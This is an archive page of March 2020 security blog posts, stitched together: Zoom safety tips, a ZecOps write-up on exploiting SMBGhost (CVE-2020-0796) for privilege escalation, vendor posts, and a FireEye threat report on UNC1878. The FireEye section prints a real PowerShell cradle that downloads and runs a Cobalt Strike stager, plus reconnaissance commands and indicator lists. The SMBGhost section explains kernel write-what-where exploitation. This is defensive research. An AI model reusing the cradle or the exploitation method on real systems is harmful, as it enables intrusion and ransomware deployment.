Monthly Archives: March 2020

How Safe are Video Messaging Apps such as Zoom?

I was privileged to be part of The Telegraph Coronavirus Podcast today, where I was asked about the security of video messaging apps.



'How safe are video messaging apps such as Zoom, and what should users bear in mind when using them?'

My reply...
Video messaging apps are an essential communication tool for at home and within businesses, especially during the COVID-19 lockdown period. They are generally safe to use but there are a few security risks which users should be aware of.

Our increased use of video messaging apps has not gone unnoticed by cybercriminals, who are seeking to exploit the increase of use by sending phishing emails, social media scam messages and even scam text messages, with fake invitations to video messaging app meetings.

Typically, these scam messages will entice you into either opening a malicious attachment or click a web link which directs to a malicious website. The ultimate aim of these cyberattacks is to deliver malicious software, such as ransomware which locks your PC and demands a ransom payment to unlock, scam a payment, or steal your personal information which can be resold to other cybercriminals on the dark web.

So, never open an attachment or click on any links within any unexpected or suspicious emails, social media messages and text messages.

The next piece of advice is to ensure your video messaging app is always kept up-to-date. Luckily most modern smartphones and computer operating systems will automatically update your apps, but it is always worth double-checking and not to suppress any app updates from occurring, as often the app updates are fixing security flaws.

And finally, on home computers and laptops, when not using video messaging apps, either cover your webcam with a piece of tape or face your webcam towards a wall or ceiling, just in case your computer is covertly compromised and a malicious actor gains access to your computer's webcam.


Additional
One tip I didn't have time to say on the podcast, is always ensure your video chats are set to private, using a strong password to prevent ZoomBombingRecent reportshave shown a series of “Zoombombing” incidents lately, where unwanted guests have joined in on open calls. 

Bharat Mistry, Principal Security Strategist at Trend Micro on Zoom advises “Although not alone in being targeted, Zoom has been the subject of some of the highest-profile incidents so far this year. Fortunately, there are things you can do to keep your business safe.

It’s all about taking advantage of unsecure settings in the app, (and possibly using brute-force tools to crack meeting IDs). With access to a meeting, hackers could harvest highly sensitive and/or market-critical corporate information, or even spread malware via a file transfer feature.

Hackers know users are looking en masse for ways to communicate during government lockdowns. By creating legitimate-looking Zoom links and websites, they could steal financial details, spread malware or harvest Zoom ID numbers, allowing them to infiltrate virtual meetings. One vendor discovered 2,000 new domains had been registered in March alone, over two-thirds of the total for the year so far.

Risk mitigation:
The good news is that there are several things you can do to mitigate the security risks associated with Zoom. The most basic are: 
  • Ensure Zoom is always on the latest software version
  • Build awareness of Zoom phishing scams into user training programmes. Users should only download the Zoom client from a trusted site and check for anything suspicious in the meeting URL when joining a meeting
  • Ensure all home workers have anti-malware including phishing detection installed from a reputable vendor
Organisational preparedness:
Next, it’s important to revisit those administrative settings in the app, to reduce the opportunities for hackers and Zoombombers. Fortunately, automatically generated passwords are now switched on by default, and the use of personal meeting IDs are switched off, meaning Zoom will create a random, one-off ID for each meeting. These setting should be kept as is. But organisations can do more, including:
  • Ensure you also generate a meeting ID automatically for recurring meetings
  • Set screen-sharing to “host only” to prevent uninvited guests from sharing disruptive content
  • Don’t share any meeting IDs online
  • Disable “file transfers” to mitigate risk of malware
  • Make sure that only authenticated users can join meetings
  • Lock the meeting once it’s started to prevent anyone new joining
  • Use waiting room feature, so the host can only allow attendees from a pre-assigned register
  • Play a sound when someone enters or leaves the room
  • Allow host to put attendees on hold, temporarily removing them from a meeting if necessary”

Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC

Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC

Introduction

CVE-2020-0796 is a bug in the compression mechanism of SMBv3.1.1, also known as “SMBGhost”. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about three weeks ago. Once we heard about it, we skimmed over the details and created a quick POC (proof of concept) that demonstrates how the bug can be triggered remotely, without authentication, by causing a BSOD (Blue Screen of Death). A couple of days ago we returned to this bug for more than just a remote DoS. The Microsoft Security Advisory describes the bug as a remote code execution (RCE) vulnerability, but there is no public POC that demonstrates RCE through this bug.

Initial Analysis

The bug is an integer overflow bug that happens in the Srv2DecompressData function in the srv2.sys SMB server driver. Here’s a simplified version of the function, with the irrelevant details omitted:

typedef struct _COMPRESSION_TRANSFORM_HEADER
{
    ULONG ProtocolId;
    ULONG OriginalCompressedSegmentSize;
    USHORT CompressionAlgorithm;
    USHORT Flags;
    ULONG Offset;
} COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;

typedef struct _ALLOCATION_HEADER
{
    // ...
    PVOID UserBuffer;
    // ...
} ALLOCATION_HEADER, *PALLOCATION_HEADER;

NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize)
{
    PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
        (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
        NULL);
    If (!Alloc) {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    ULONG FinalCompressedSize = 0;

    NTSTATUS Status = SmbCompressionDecompress(
        Header->CompressionAlgorithm,
        (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
        (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
        (PUCHAR)Alloc->UserBuffer + Header->Offset,
        Header->OriginalCompressedSegmentSize,
        &FinalCompressedSize);
    if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
        SrvNetFreeBuffer(Alloc);
        return STATUS_BAD_DATA;
    }

    if (Header->Offset > 0) {
        memcpy(
            Alloc->UserBuffer,
            (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
            Header->Offset);
    }

    Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
    return STATUS_SUCCESS;
}

The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.

If we look carefully, we can notice that lines 20 and 31 can lead to an integer overflow for certain inputs. For example, most POCs that appeared shortly after the bug publication and crashed the system just used the 0xFFFFFFFF value for the Offset field. Using the value 0xFFFFFFFF triggers an integer overflow on line 20, and as a result less bytes are allocated.

Later, it triggers an additional integer overflow on line 31. The crash happens due to a memory access at the address calculated in line 30, far away from the received message. If the code verified the calculation at line 31, it would bail out early since the buffer length happens to be negative and cannot be represented, and that makes the address itself on line 30 invalid as well.

Choosing what to overflow

There are only two relevant fields that we can control to cause an integer overflow: OriginalCompressedSegmentSize and Offset, so there aren’t that many options. After trying several combinations, the following combination caught our eye: what if we send a legit Offset value and a huge OriginalCompressedSegmentSize value? Let’s go over the three steps the code is going to execute:

  1. Allocate: The amount of allocated bytes will be smaller than the sum of both fields due to the integer overflow.
  2. Decompress: The decompression will receive a huge OriginalCompressedSegmentSize value, treating the target buffer as practically having limitless size. All other parameters are unaffected thus it will work as expected.
  3. Copy: If it’s ever going to be executed (will it?), the copy will work as expected.

Whether or not the Copy step is going to be executed, it already looks interesting – we can trigger an out of bounds write on the Decompress stage since we managed to allocate less bytes then necessary on the Allocate stage.

As you can see, using this technique we can trigger an overflow of any size and content, which is a great start. But what is located beyond our buffer? Let’s find out!

Diving into SrvNetAllocateBuffer

To answer this question, we need to look at the allocation function, in our case SrvNetAllocateBuffer. Here is the interesting part of the function:

PALLOCATION_HEADER SrvNetAllocateBuffer(SIZE_T AllocSize, PALLOCATION_HEADER SourceBuffer)
{
    // ...

    if (SrvDisableNetBufferLookAsideList || AllocSize > 0x100100) {
        if (AllocSize > 0x1000100) {
            return NULL;
        }
        Result = SrvNetAllocateBufferFromPool(AllocSize, AllocSize);
    } else {
        int LookasideListIndex = 0;
        if (AllocSize > 0x1100) {
            LookasideListIndex = /* some calculation based on AllocSize */;
        }

        SOME_STRUCT list = SrvNetBufferLookasides[LookasideListIndex];
        Result = /* fetch result from list */;
    }

    // Initialize some Result fields...

    return Result;
}

We can see that the allocation function does different things depending on the required amount of bytes. Large allocations (larger than about 16 MB) just fail. Medium allocations (larger than about 1 MB) use the SrvNetAllocateBufferFromPool function for the allocation. Small allocations (the rest) use lookaside lists for optimization.

Note: There’s also the SrvDisableNetBufferLookAsideList flag which can affect the functionality of the function, but it’s set by an undocumented registry setting and is disabled by default, so it’s not very interesting.

Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver. One of the capabilities of lookaside lists is to define a custom allocation/free functions which will be used for managing the buffers. Looking at references for the SrvNetBufferLookasides array, we found that it’s initialized in the SrvNetCreateBufferLookasides function, and by looking at it we learned the following:

  • The custom allocation function is defined as SrvNetBufferLookasideAllocate, which just calls SrvNetAllocateBufferFromPool.
  • 9 lookaside lists are created with the following sizes, as we quickly calculated with Python:
    >>> [hex((1 << (i + 12)) + 256) for i in range(9)]
    [‘0x1100’, ‘0x2100’, ‘0x4100’, ‘0x8100’, ‘0x10100’, ‘0x20100’, ‘0x40100’, ‘0x80100’, ‘0x100100’]

    It matches our finding that allocations larger than 0x100100 bytes are allocated without using lookaside lists.

The conclusion is that every allocation request ends up in the SrvNetBufferLookasideAllocate function, so let’s take a look at it.

SrvNetBufferLookasideAllocate and the allocated buffer layout

The SrvNetBufferLookasideAllocate function allocates a buffer in the NonPagedPoolNx pool using the ExAllocatePoolWithTag function, and then fills some of the structures with data. The layout of the allocated buffer is the following:

The only relevant parts of this layout for the scope of our research are the user buffer and the ALLOCATION_HEADER struct. We can see right away that by overflowing the user buffer, we end up overriding the ALLOCATION_HEADER struct. Looks very convenient.

Overriding the ALLOCATION_HEADER struct

Our first thought at this point was that due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    SrvNetFreeBuffer(Alloc);
    return STATUS_BAD_DATA;
}

SrvNetFreeBuffer will be called and the function will fail, since we crafted OriginalCompressedSegmentSize to be a huge number, and FinalCompressedSize is going to be a smaller number which represents the actual amount of decompressed bytes. So we analyzed the SrvNetFreeBuffer function, managed to replace the allocation pointer to a magic number, and waited for the free function to try and free it, hoping to leverage it later for use-after-free or similar. But to our surprise, we got a crash in the memcpy function. That has made us happy, since we didn’t hope to get there at all, but we had to check why it happened. The explanation can be found in the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (Status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;
    }

    // ...

    return Status;
}

Basically, if the decompression succeeds, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. This deliberate update of the FinalCompressedSize return value seemed quite suspicious for us, since this little detail, together with the allocated buffer layout, allows for a very convenient exploitation of this bug.

Since the execution continues to the stage of copying the raw data, let’s review the call once again:

memcpy(
    Alloc->UserBuffer,
    (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
    Header->Offset);

The target address is read from the ALLOCATION_HEADER struct, the one that we can override. The content and the size of the buffer are controlled by us as well. Jackpot! Write-what-where in the kernel, remotely!

Remote write-what-where implementation

We did a quick implementation of a Write-What-Where CVE-2020-0796 Exploit in Python, which is based on the CVE-2020-0796 DoS POC of maxpl0it. The code is fairly short and straightforward.

Local Privilege Escalation

Now that we have the write-what-where exploit, what can we do with it? Obviously we can crash the system. We might be able to trigger remote code execution, but we didn’t find a way to do that yet. If we use the exploit on localhost and leak additional information, we can use it for local privilege escalation, as it was already demonstrated to be possible via several techniques.

The first technique we tried was proposed by Morten Schenk in his Black Hat USA 2017 talk. The technique involves overriding a function pointer in the .data section of the win32kbase.sys driver, and then calling the appropriate function from user mode to gain code execution. j00ru wrote a great writeup about using this technique in WCTF 2018, and provided his exploit source code. We adjusted it for our write-what-where exploit, but found out that it doesn’t work since the thread that handles the SMB messages is not a GUI thread. Due to this, win32kbase.sys is not mapped, and the technique is not relevant (unless there’s a way to make it a GUI thread, something we didn’t research).

We ended up using the well known technique covered by cesarcer in 2012 in his Black Hat presentation Easy Local Windows Kernel Exploitation. The technique is about leaking the current process token address by using the NtQuerySystemInformation(SystemHandleInformation) API, and then overriding it, granting the current process token privileges that can then be used for privilege escalation. The Abusing Token Privileges For EoP research by Bryan Alexander (dronesec) and Stephen Breen (breenmachine) (2017) demonstrates several ways of using various token privileges for privilege escalation.

We based our exploit on the code that Alexandre Beaulieu kindly shared in his Exploiting an Arbitrary Write to Escalate Privileges writeup. We completed the privilege escalation after modifying our process’ token privileges by injecting a DLL into winlogon.exe. The DLL’s whole purpose is to launch a privileged instance of cmd.exe. Our complete Local Privilege Escalation Proof of Concept can be found here and is available for research / defensive purposes only.

Summary

We managed to demonstrate that the CVE-2020-0796 vulnerability can be exploited for local privilege escalation. Note that our exploit is limited for medium integrity level, since it relies on API calls that are unavailable in a lower integrity level. Can we do more than that? Maybe, but it will require more research. There are many other fields that we can override in the allocated buffer, perhaps one of them can help us achieve other interesting things such as remote code execution.

POC Source Code

Remediation

  1. We recommend updating servers and endpoints to the latest Windows version to remediate this vulnerability. If possible, block port 445 until updates are deployed. Regardless of CVE-2020-0796, we recommend enabling host-isolation where possible.
  2. It is possible to disable SMBv3.1.1 compression in order to avoid triggers to this bug, however we recommend to do full update instead if possible.

ZecOps Customers & Partners

ZecOps Digital Forensics and Incident Response (DFIR) customers can detect such exploitation attempts as “CVE-2020-0796” using ZecOps agentless solution: Neutrino for Servers and Endpoints. To try ZecOps technology and see a demo, you can contact us here

Researchers wanted

At ZecOps we’re working on offensive cyber security research for defensive purposes. We are hiring additional researchers & exploit developers in various platforms including iOS and Windows. If you are interested, contact us here.

Why Light Point Security Is Joining the McAfee Team

As of March 31, Light Point Security has been acquired by McAfee. It’s an exciting time for Light Point Security and McAfee. Since the acquisition was announced, I’ve often been asked: Why McAfee? So, let me take this opportunity to share why Light Point Security chose to join forces with McAfee in offering remote browser isolation and advancing this formidable malware protection technology.

Important reasons why we at Light Point Security believe McAfee is a perfect fit include:

  1. McAfee’s core values include putting its customers first. At Light Point Security, we always put our customers first and pride ourselves in delivering an exceptional customer experience. We value and care for our customers tremendously. They are the lifeblood of our business, and it was critical for us to find a partner that would give our customers the same level of support to which they are accustomed. We feel confident in McAfee’s commitment to customer success, not only because it is one of McAfee’s five core values, but also through the words and actions of the McAfee team.
  2. We believe that Light Point Security has a superior remote browser isolation solution. It delivers an ideal balance of high security and excellent performance. Innovation has always been at the core of Light Point Security. We began developing our remote browser isolation technology to protect organizations from web-based malware way back in 2007. It was an idea that presented challenges, risks, and unknowns. The technology needed to deliver such a solution was still in its infancy. For example, AWS EC2 had just launched the previous year, and virtualization and containerization technologies were not as commonplace as they are today. Our commitment to innovation drove us to build Light Point Web. Innovation is still an integral part of who we are and our DNA. We knew we wanted a partner that valued innovation without fear. McAfee is a company always looking for the next big thing, and delivering new, innovative solutions. These solutions include: MVISION Unified Cloud Edge, a cloud-native converged DLP; McAfee Web Gateway; and McAfee MVISION Cloud’s CASB solution, which simplified the adoption of Secure Access Service Edge (SASE) architecture instead of simply being an “us too” company content with following the pack. Innovating without fear is another McAfee core value, and McAfee’s vision of MVISION Unified Cloud Edge loudly backs up this claim.
  3. I am always looking to surround myself with people smarter than I am; people I can learn from and people I can trust. I am not easy to please, and I do not settle for anything but the best. In every interaction, we’ve found the McAfee team to be exceptionally smart and full of great ideas for overcoming the challenges we’ve discussed. At the same time, everyone at McAfee has been personable, friendly, approachable, and easy to work with. McAfee is a team I feel confident I will enjoy working with and will push my professional growth. When Beau Adkins and I launched Light Point Security as our first startup, we maintained our commitment to our vision and customers. We now feel Light Point Security joining the McAfee team is the best decision for our customers and McAfee’s customers.

The sky’s the limit for browser isolation. Our solution can protect users from zero-day threats and other emerging malware like ransomware by isolating browser sessions in a remote virtual environment outside of the corporate network. When fully implemented, our solution delivers a virtually impenetrable defense against malware. I believe integrating Light Point Security browser isolation into the MVISION Unified Cloud Edge platform is just the beginning. As the market becomes more aware of the capabilities of browser isolation and the technology matures, I believe that remote browser isolation will become a must-have critical capability of not only secure web gateway architecture but also will deliver value in other use-cases from device to cloud. I strongly believe the integration of Light Point Web into the MVISION Unified Cloud Edge platform and McAfee’s fearless innovators will advance remote browser isolation into the future of malware defense and beyond.

For these reasons – and many others – we at Light Point Security are excited to join the McAfee team.

The post Why Light Point Security Is Joining the McAfee Team appeared first on McAfee Blogs.

Responding to the New Normal: How to Prevent Added Risk in Your Business

Undefined

Our world has shifted dramatically over the last few weeks. Many people have moved from shock to acceptance as the novel coronavirus (COVID-19) has taken hold across the world, across our nation, in our states, in our communities, and even in our organizations.

Companies are particularly vulnerable during this time from opportunists, threat actors, and even insider threats. Even with hackers promising no more healthcare cyberattacks during this pandemic, organizations cannot be complacent to the real threats and security challenges that exist across every sector.

All this uncertainty has led to the recognition that we must rapidly shift the way business is conducted. Millions of knowledge workers are now working from home, with companies like Amazon, Google, Microsoft, and Facebook mandating their employees work remotely. Organizations are facing unprecedented challenges and how we address them together will impact our future for the long term. So what can companies do to ensure the safety and security of their workers and ultimately their business?
 

Top Cybersecurity Challenges Across a Remote Workforce  

With more employees than ever working remotely, there are numerous potential threats that organizations must be aware of. Let’s take a look at five pressing concerns that should be top of mind right now for cybersecurity professionals:

#1: Enforcing Ongoing Cybersecurity Awareness

Now that millions of people are working from home, it is essential that companies heavily enforce their cybersecurity policies and practices. Employees may be more likely to click on malicious emails from phishing and other social engineering activities or install unauthorized applications, so security teams must reinforce and reeducate workers on the importance of security awareness during this critical time.

#2: Overseeing Personal and Mobile Device Security

Companies must also recognize there is increased risk for malware on mobile and personal devices, especially with such a wide range of operating systems and platforms. Workers may also be more willing to save confidential data to their personal devices, putting company and customer data at risk. Security teams should require device registration and provide oversight of devices allowed to access company data.

#3: Leveraging Secure Connections

It is highly possible that many remote workers are using connections that are not secure to connect to company networks. This opens organizations up to potential breaches and gives inroads to potential attackers. Security leaders should reinforce and remind employees of the importance in using secure networks while working remotely. Using a virtual private network helps to ensure that employees are secure when they access your company data, systems, and applications.

#4: Prioritizing Data Encryption

With so many interactions over email or chat that occur each day within your organization, it can be easy to forget when working from home the importance of encrypting confidential information. Unencrypted documents sent and stored on devices are subject to potential attack. And even when companies have encryption technology, it is no use if employees fail to use it. Security professionals should adopt and enforce encryption policies, especially as a large majority of employees are now remote.

#5: Ensuring Strong Password Management and Authentication

With so many applications and devices, it can be difficult for organizations to ensure employees are adhering to password policies. During a time when a majority of workers may be home, it is essential to have strong password management in place. This avoids overburdening helpdesks for password resets and enables 24x7 self-service ability. But it must be done in a way that leverages secure and flexible authentication methods with mobile reset, telephone-based keypad resets, or voice biometrics.
 

Mitigating Ongoing Risks With Action and Intelligence

Mitigating risks with a remote workforce requires two essential things—action and intelligence. This means understanding where your greatest risks exist by uncovering who and what is most vulnerable in your IT environment. During the midst of an uncertain time, it is more important than ever to prevent, detect, test, and monitor risk in your business and across your workforce.

By evaluating and identifying your greatest infrastructure, device, and employee-related risks, and putting the right security risk management strategies in place, you can gain the intelligence required to take action and respond real-time to this unfolding situation. Remember, fear is not the greatest threat that exists to your workers and business today. Being unprepared is.

cs-covid19-new-normal-700x350.png

covid19-new-normal
Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs
Learn About Leading-Edge Security Risk Management Solutions

Find out how Core Security offers comprehensive security risk management solutions
to meet the most pressing needs of each organization across any industry today.

It’s Your Money and They Want It Now — The Cycle of Adversary Pursuit

When we discover new intrusions, we ask ourselves questions that will help us understand the totality of the activity set.

How common is this activity? Is there anything unique or special about this malware or campaign? What is new and what is old in terms of TTPs or infrastructure? Is this being seen anywhere else? What information do I have that substantiates the nature of this threat actor?

To track a fast-moving adversary over time, we exploit organic intrusion data, pivot to other data sets, and make that knowledge actionable for analysts and incident responders, enabling new discoveries and assessments on the actor. The FireEye Advanced Practices team exists to know more about the adversary than anyone else, and by asking and answering questions such as these, we enable analyst action in security efforts. In this blog post, we highlight how our cycle of identification, expansion, and discovery was used to track a financially motivated actor across FireEye’s global data sets.

Identification

On January 29, 2020, FireEye Managed Defense investigated multiple TRICKBOT deployments against a U.S. based client. Shortly after initial deployment, TRICKBOT’s networkDll module ran the following network reconnaissance commands (Figure 1).

ipconfig /all
net config workstation
net view /all
net view /all /domain
nltest /domain_trusts
nltest /domain_trusts /all_trusts

Figure 1: Initial Reconnaissance

Approximately twenty minutes after reconnaissance, the adversary ran a PowerShell command to download and execute a Cobalt Strike HTTPS BEACON stager in memory (Figure 2).

cmd.exe /c powershell.exe -nop –w hidden –c “IEX ((new-object net.webclient).downloadstring(‘hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt’))”

Figure 2: PowerShell download cradle used to request a Cobalt Strike stager

Six minutes later, Managed Defense identified evidence of enumeration and attempted lateral movement through the BEACON implant. Managed Defense alerted the client of the activity and the affected hosts were contained, stopping the intrusion in its tracks. A delta of approximately forty-six minutes between a TRICKBOT infection and attempted lateral movement was highly unusual and, along with the clever masquerade domain, warranted further examination by our team.

Although light, indicators from this intrusion were distinct enough to create an uncategorized threat group, referred to as UNC1878. At the time of initial clustering, UNC1878’s intent was not fully understood due to the rapid containment of the intrusion by Managed Defense. By creating this label, we are able to link activity from the Managed Defense investigation into a single entity, allowing us to expand our understanding of this group and track their activity over time. This is especially important when dealing with campaigns involving mass malware, as it helps delineate the interactive actor from the malware campaign they are leveraging. For more information on our clustering methodology, check out our post about how we analyze, separate, or merge these clusters at scale.

Expansion

Pivoting on the command and control (C2) domain allowed us to begin building a profile of UNC1878 network infrastructure. WHOIS records for cylenceprotect[.]com (Figure 3) revealed that the domain was registered on January 27, 2020, with the registrar "Hosting Concepts B.V. d/b/a Openprovider", less than two days before we saw this domain used in activity impacting the Managed Defense customer.

Domain Name: cylenceprotect.com
Registry Domain ID: 2485487352_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.registrar.eu
Registrar URL: http://www.registrar.eu
Updated Date: 2020-01-28T00:35:43Z
Creation Date: 2020-01-27T23:32:18Z
Registrar Registration Expiration Date: 2021-01-27T23:32:18Z
Registrar: Hosting Concepts B.V. d/b/a Openprovider

Figure 3: WHOIS record for the domain cylenceprotect[.]com

Turning our attention to the server, the domain resolved to 45.76.20.140, an IP address owned by the VPS provider Choopa. In addition, the domain used self-hosted name servers ns1.cylenceprotect[.]com and ns2.cylenceprotect[.]com, which also resolved to the Choopa IP address. Network scan data for the server uncovered a certificate on port 80 and 443, a snippet of which can be seen in Figure 4.

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            03:a8:60:02:c7:dd:7f:88:5f:2d:86:0d:88:41:e5:3e:25:f0
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
        Validity
            Not Before: Jan 28 02:02:14 2020 GMT
            Not After : Apr 27 02:02:14 2020 GMT
        Subject: CN=cylenceprotect[.]com

Figure 4: TLS Certificate for the domain cylenceprotect[.]com

The certificate was issued by Let’s Encrypt, with the earliest validity date within 24 hours of the activity detected by Managed Defense, substantiating the speed in which this threat actor operates. Along with the certificate in Figure 4, we also identified the default generated, self-signed Cobalt Strike certificate (Figure 5) on port 54546 (50050 by default).

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1843990795 (0x6de9110b)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike
        Validity
            Not Before: Jan 28 03:06:30 2020 GMT
            Not After : Apr 27 03:06:30 2020 GMT
        Subject: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike

Figure 5: Default Cobalt Strike TLS Certificate used by UNC1878

Similar to the certificate on port 80 and 443, the earliest validity date was again within 24 hours of the intrusion identified by Managed Defense. Continuing analysis on the server, we acquired the BEACON stager and subsequent BEACON payload, which was configured to use the Amazon malleable C2 profile.

While these indicators may not hold significant weight on their own, together they create a recognizable pattern to fuel proactive discovery of related infrastructure. We began hunting for servers that exhibited the same characteristics as those used by UNC1878. Using third-party scan data, we quickly identified additional servers that matched a preponderance of UNC1878 tradecraft:

  • Domains typically comprised of generic IT or security related terms such as “update”, “system”, and “service”.
  • Domains registered with “Hosting Concepts B.V. d/b/a Openprovider" as early as December 19, 2019.
  • Self-hosted name servers.
  • Let’s Encrypt certificates on port 80.
  • Virtual private servers hosted predominantly by Choopa.
  • BEACON payloads configured with the Amazon malleable C2 profile.
  • Cobalt Strike Teams Servers on non-standard ports.

Along with certificates matching UNC1878 tradecraft, we also found self-signed Armitage certificates, indicating this group may use multiple offensive security tools.

Pivoting on limited indicators extracted from a single Managed Defense intrusion, a small cluster of activity was expanded into a more diverse set of indicators cardinal to UNC1878. While the objective and goal of this threat actor had not yet manifested, the correlation of infrastructure allowed our team to recognize this threat actor’s operations against other customers.

Discovery

With an established modus operandi for UNC1878, our team quickly identified several related intrusions in support of FireEye Mandiant investigations over the next week. Within two days of our initial clustering and expansion of UNC1878 from the original Managed Defense investigation, Mandiant Incident Responders were investigating activity at a U.S. based medical equipment company with several indicators we had previously identified and attributed to UNC1878. Attributed domains, payloads and methodologies provided consultants with a baseline to build detections on, as well as a level of confidence in the actor’s capabilities and speed in which they operate.

Three days later, UNC1878 was identified during another incident response engagement at a restaurant chain. In this engagement, Mandiant consultants found evidence of attempted deployment of RYUK ransomware on hundreds of systems, finally revealing UNC1878’s desired end goal. In the following weeks, we continued to encounter UNC1878 in various phases of their intrusions at several Mandiant Incident Response and Managed Defense customers.

While services data offers us a depth of understanding into these intrusions, we turn to our product telemetry to understand the breadth of activity, getting a better worldview and perspective on the global prevalence of this threat actor. This led to the discovery of an UNC1878 intrusion at a technology company, resulting in Mandiant immediately notifying the affected customer. By correlating multiple UNC1878 intrusions across our services and product customers, it became evident that the targeting was indiscriminate, a common characteristic of opportunistic ransomware campaigns.

Although initially there were unanswered questions surrounding UNC1878’s intent, we were able to provide valuable insights into their capabilities to our consultants and analysts. In turn, the intrusion data gathered during these engagements continued the cycle of building our understanding of UNC1878’s tradecraft, enabling our responders to handle these incidents swiftly in the face of imminent ransomware deployment.

Conclusion

Threat actors continue to use mass malware campaigns to establish footholds into target environments, followed by interactive operations focused on deploying ransomware such as RYUK, DOPPLEPAYMER and MAZE. Looking at the overall trend of intrusions FireEye responds to, the growing shift from traditional PCI theft to ransomware has allowed threat actors such as UNC1878 to widen their scope and increase their tempo, costing organizations millions of dollars due to business disruption and ransom payments. However, apart from their speed, UNC1878 does not stand out among the increasing number of groups following this trend, and should not be the key takeaway of this blog post.

The cycle of analysis and discovery used for UNC1878 lies at the core of our team’s mission to rapidly detect and pursue impactful adversaries at scale. Starting from a singular intrusion at a Managed Defense client, we were able to discover UNC1878 activity at multiple customers. Using our analysis of the early stages of their activity allowed us to pivot and pursue this actor across otherwise unrelated investigations. As we refine and expand our understanding of UNC1878’s tradecraft, our team enables Mandiant and Managed Defense to efficiently identify, respond to, and eradicate a financially motivated threat actor whose end goal could cripple targeted organizations. The principles applied in pursuit of this actor are crucial to tracking any adversary and are ultimately how the Advanced Practices team surfaces meaningful activity across the FireEye ecosystem.

Acknowledgements

Thank you to Andrew Thompson, Dan Perez, Steve Miller, John Gorman and Brendan McKeague for technical review of this content. In addition, thank you to the frontline responders harvesting valuable intrusion data that enables our research.

Indicators of Compromise

Domains

  • aaatus[.]com
  • avrenew[.]com
  • besttus[.]com
  • bigtus[.]com
  • brainschampions[.]com
  • checkwinupdate[.]com
  • ciscocheckapi[.]com
  • cleardefencewin[.]com
  • cmdupdatewin[.]com
  • comssite[.]com
  • conhostservice[.]com
  • cylenceprotect[.]com
  • defenswin[.]com
  • easytus[.]com
  • findtus[.]com
  • firsttus[.]com
  • freeallsafe[.]com
  • freeoldsafe[.]com
  • greattus[.]com
  • havesetup[.]net
  • iexploreservice[.]com
  • jomamba[.]best
  • livecheckpointsrs[.]com
  • livetus[.]com
  • lsassupdate[.]com
  • lsasswininfo[.]com
  • microsoftupdateswin[.]com
  • myservicebooster[.]com
  • myservicebooster[.]net
  • myserviceconnect[.]net
  • myserviceupdater[.]com
  • myyserviceupdater[.]com
  • renovatesystem[.]com
  • service-updater[.]com
  • servicesbooster[.]com
  • servicesbooster[.]org
  • servicesecurity[.]org
  • serviceshelpers[.]com
  • serviceupdates[.]net
  • serviceuphelper[.]com
  • sophosdefence[.]com
  • target-support[.]online
  • taskshedulewin[.]com
  • timesshifts[.]com
  • topsecurityservice[.]net
  • topservicehelper[.]com
  • topservicesbooster[.]com
  • topservicesecurity[.]com
  • topservicesecurity[.]net
  • topservicesecurity[.]org
  • topservicesupdate[.]com
  • topservicesupdates[.]com
  • topserviceupdater[.]com
  • update-wind[.]com
  • updatemanagir[.]us
  • updatewinlsass[.]com
  • updatewinsoftr[.]com
  • web-analysis[.]live
  • windefenceinfo[.]com
  • windefens[.]com
  • winsysteminfo[.]com
  • winsystemupdate[.]com
  • worldtus[.]com
  • yoursuperservice[.]com

IP Addresses

  • 31.7.59.141
  • 45.32.30.162
  • 45.32.130.5
  • 45.32.161.213
  • 45.32.170.9
  • 45.63.8.219
  • 45.63.95.187
  • 45.76.20.140
  • 45.76.167.35
  • 45.76.231.195
  • 45.77.58.172
  • 45.77.89.31
  • 45.77.98.157
  • 45.77.119.212
  • 45.77.153.72
  • 45.77.206.105
  • 63.209.33.131
  • 66.42.97.225
  • 66.42.99.79
  • 79.124.60.117
  • 80.240.18.106
  • 81.17.25.210
  • 95.179.147.215
  • 95.179.210.8
  • 95.179.215.228
  • 96.30.192.141
  • 96.30.193.57
  • 104.156.227.250
  • 104.156.245.0
  • 104.156.250.132
  • 104.156.255.79
  • 104.238.140.239
  • 104.238.190.126
  • 108.61.72.29
  • 108.61.90.90
  • 108.61.176.237
